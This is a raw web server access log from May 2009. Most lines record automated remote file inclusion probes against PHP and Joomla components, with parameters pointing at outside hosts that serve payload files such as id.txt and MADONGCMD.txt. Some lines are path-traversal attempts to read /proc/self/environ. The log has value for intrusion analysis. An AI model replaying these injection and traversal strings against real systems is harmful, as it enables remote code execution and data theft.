124.0.54.98 - - [08/May/2009:03:07:37 -0400] "GET /logs/access_log.Q109041900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:03:07:49 -0400] "GET /logs/access_log.Q109041200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.74.61.78 - - [08/May/2009:03:08:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
85.214.20.7 - - [08/May/2009:03:08:04 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:08:10 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:08:10 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:08:10 -0400] "GET /logs/access_log.Q108092900//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:08:10 -0400] "GET /logs/access_log.Q108060400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:08:25 -0400] "GET /logs/access_log.Q108102500%20%20/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:08:26 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:08:26 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:08:26 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:08:28 -0400] "GET //index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:08:28 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.6.164.197 - - [08/May/2009:03:08:34 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
78.6.164.197 - - [08/May/2009:03:08:34 -0400] "GET /logs/access_log.Q108091000//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
78.6.164.197 - - [08/May/2009:03:08:34 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
78.6.164.197 - - [08/May/2009:03:08:34 -0400] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
78.6.164.197 - - [08/May/2009:03:08:34 -0400] "GET /logs/access_log.Q108091000/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
78.6.164.197 - - [08/May/2009:03:08:34 -0400] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
78.6.164.197 - - [08/May/2009:03:08:36 -0400] "GET /logs/access_log.Q108091000//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 264 "-" "XXXXXX"
78.6.164.197 - - [08/May/2009:03:08:36 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
78.6.164.197 - - [08/May/2009:03:08:37 -0400] "GET /logs/access_log.Q108091000//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "XXXXXX"
78.6.164.197 - - [08/May/2009:03:08:39 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 242 "-" "XXXXXX"
78.6.164.197 - - [08/May/2009:03:08:39 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
78.6.164.197 - - [08/May/2009:03:08:40 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "XXXXXX"
86.54.102.45 - - [08/May/2009:03:08:45 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:08:45 -0400] "GET /logs/access_log.Q108060800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:08:45 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:08:45 -0400] "GET /logs/access_log.Q108060400%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:08:45 -0400] "GET /logs/access_log.Q108092900%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:03:08:49 -0400] "GET /logs/access_log.Q108092600/?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:03:08:49 -0400] "GET /logs/access_log.Q108091300/?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:03:08:49 -0400] "GET /logs/?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 480 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:03:08:49 -0400] "GET /?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
78.6.164.197 - - [08/May/2009:03:08:54 -0400] "GET /logs/access_log.Q108101300//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
78.6.164.197 - - [08/May/2009:03:08:54 -0400] "GET /logs/access_log.Q108101300/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
221.157.225.65 - - [08/May/2009:03:08:54 -0400] "GET /logs/access_log.Q108102500%20%20//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.6.164.197 - - [08/May/2009:03:08:54 -0400] "GET /logs/access_log.Q108101300//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 264 "-" "XXXXXX"
78.6.164.197 - - [08/May/2009:03:08:55 -0400] "GET /logs/access_log.Q108101300//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "XXXXXX"
69.94.30.156 - - [08/May/2009:03:08:57 -0400] "GET //modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:09:00 -0400] "GET /logs//modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:09:01 -0400] "GET /logs/access_log.Q108091400//modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:09:03 -0400] "GET //modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:09:03 -0400] "GET /logs//modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:09:03 -0400] "GET /logs/access_log.Q108091400%20%20//modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:09:13 -0400] "GET /logs/access_log.Q108100400//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:03:09:14 -0400] "GET /logs/access_log.Q109041200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:09:26 -0400] "GET /logs/access_log.Q108102500//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:03:09:59 -0400] "GET /logs/access_log.Q109040200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:03:10:10 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:03:10:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.54.102.45 - - [08/May/2009:03:10:36 -0400] "GET /logs/access_log.Q108060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:10:41 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:10:41 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:10:41 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:10:46 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:10:51 -0400] "GET /logs//modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:10:51 -0400] "GET //modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:03:10:51 -0400] "GET /logs/access_log.Q108091400//modules/SPChat/images/12.php?teste=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.214.34.244 - - [08/May/2009:03:10:54 -0400] "GET /logs/access_log.Q108111200//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:10:54 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:10:54 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:10:54 -0400] "GET /logs/access_log.Q108111200//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:10:54 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:10:55 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
121.254.231.239 - - [08/May/2009:03:11:09 -0400] "GET /logs/index.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:11:09 -0400] "GET /index.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:11:09 -0400] "GET /logs/access_log.Q108102900%20%20/index.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:03:11:09 -0400] "GET /logs/access_log.Q109040200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:11:46 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:11:46 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:11:46 -0400] "GET /logs/access_log.Q108090700//oneadmin/photogallery/include.php?path[docroot]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:11:52 -0400] "GET /logs/access_log.Q108081900//oneadmin/photogallery/include.php?path[docroot]=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:03:12:09 -0400] "GET /logs/access_log.Q108100900//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:03:12:09 -0400] "GET /logs/access_log.Q108103100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:03:12:15 -0400] "GET /logs/access_log.Q108081900//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:12:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:12:17 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:12:17 -0400] "GET /logs/access_log.Q108060800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
202.53.250.98 - - [08/May/2009:03:12:23 -0400] "GET /logs/access_log.Q108060900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
85.214.34.244 - - [08/May/2009:03:12:23 -0400] "GET /logs/access_log.Q108101700//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
85.214.34.244 - - [08/May/2009:03:12:24 -0400] "GET /logs/access_log.Q108101700//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
77.221.130.6 - - [08/May/2009:03:12:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
202.53.250.98 - - [08/May/2009:03:12:29 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
211.110.19.178 - - [08/May/2009:03:12:33 -0400] "GET /logs/access_log.Q108092600%20%20/?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.53.250.98 - - [08/May/2009:03:12:37 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
211.110.19.178 - - [08/May/2009:03:12:40 -0400] "GET /logs/access_log.Q108083000%20%20/?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:12:40 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:12:44 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:03:13:08 -0400] "GET /logs/error_log.Q107122200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.157.225.65 - - [08/May/2009:03:13:09 -0400] "GET /logs/access_log.Q108081700//index.php?DOCUMENT_ROOT=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.53.250.98 - - [08/May/2009:03:13:36 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
110.45.146.146 - - [08/May/2009:03:14:04 -0400] "GET /logs/access_log.Q109010100/components/com_forum/download.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:03:15:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.98 - - [08/May/2009:03:16:26 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:16:29 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:16:29 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:16:43 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:16:43 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:03:16:50 -0400] "GET /logs/error_log.Q107122700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.254.231.239 - - [08/May/2009:03:16:51 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:16:51 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:16:51 -0400] "GET /logs/access_log.Q109042500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:17:04 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:17:09 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:17:11 -0400] "GET /logs/access_log.Q109020700//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:17:32 -0400] "GET /logs/access_log.Q108102400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
59.109.75.80 - - [08/May/2009:03:17:52 -0400] "GET /announcements.php?phpraid_dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 215 "-" "Mozilla/5.0"
59.109.75.80 - - [08/May/2009:03:17:58 -0400] "GET /logs/announcements.php?phpraid_dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 220 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:18:09 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:03:18:09 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
59.109.75.80 - - [08/May/2009:03:18:11 -0400] "GET /logs/access_log.Q108072200%20%20/announcements.php?phpraid_dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 244 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:18:24 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:03:18:35 -0400] "GET /logs/access_log.Q108081900 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.20.225.45 - - [08/May/2009:03:19:08 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [08/May/2009:03:20:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [08/May/2009:03:20:44 -0400] "GET /img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:03:20:44 -0400] "GET /logs/img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:03:20:44 -0400] "GET /logs/access_log.Q108090300/img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
59.109.75.86 - - [08/May/2009:03:20:46 -0400] "GET /logs/access_log.Q108072200/announcements.php?phpraid_dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:03:20:46 -0400] "GET /logs/img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:03:20:47 -0400] "GET /logs/access_log.Q108090300/img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:03:20:47 -0400] "GET /img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:21:22 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
